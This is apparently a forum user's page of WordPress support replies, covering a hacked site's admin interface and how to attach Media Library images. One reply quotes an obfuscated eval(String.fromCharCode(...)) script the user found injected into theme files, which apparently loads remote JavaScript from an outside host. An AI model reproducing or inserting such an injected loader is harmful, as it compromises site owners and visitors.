xam-kan
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: add media buttons disappeared overnightIt was found out that the entire server has been hacked. Thanks RVoodoo for the quick and helpful responses + the site too.
Forum: Fixing WordPress
In reply to: add media buttons disappeared overnightwas the hack on the hosting server side or my computer client side? I have been updating the site online, because I don’t have the WP tools installed on my computer.
Thanks again!
Forum: Fixing WordPress
In reply to: add media buttons disappeared overnightThanks for the quick reply. I probably need to clear up my post a little. The site that I worked with is fine. It was the administrative interface got changed. I added some postings to the site that I work with, by using WP administrative tools, last evening. Everything was fine. Until I use the administrative tools again this morning and the administrative interface looked different.
I have a backup from a month back, and I ‘diff’ it. I notice this piece of code in current ‘header.php’ and ‘comments-popup.php’ files:
<kJNPAGyUfwlpmhli1o6kENwBUZTAKZoUZ5KH6vuxrkQU5><script>eval(String.fromCharCode(102,117,110,99,103,105,111,116,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,116,61,100,111,99,117,109,121,110,105,46,99,67,101,97,116,101,69,108,101,109,105,110,116,40,34,115,99,116,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,97,101,103,104,105,101,98,101,101,115,105,111,103,111,104,46,105,110,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,67,112,101,110,100,67,104,105,108,100,40,105,41,125,99,97,116,99,104,40,101,41,123,125,116,121,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTAKZoUZ5KH6vuxrkQU5>
I wondered if this kind of code is safe and normal to have in a site.
I also have a lot of file in ‘cache’ folder, could I delete those without affecting the site’s current operations?
Thanks, and TIA
Forum: Fixing WordPress
In reply to: Media Library attachements not keep up to dateI would like to have that option too.
1. added a image to the ‘Media Library’
2. go back to ‘Post’ > ‘Edit’
3. click on ‘Edit’ on the post that you want to attach the image to
4. at ‘Upload/Insert’, click on ‘Add an Image’ icon
5. click on ‘Media Library’ tab
6. locate the image that you want to attach, click on ‘show’ button next to it
7. click on ‘Insert into Post’ button
8. <img … /> code would be automatically added into the post, you can remove that portion and the image would still be attached to the post
9. you don’t have to click on ‘Update Post’ button, if you don’t need the <img … /> automated code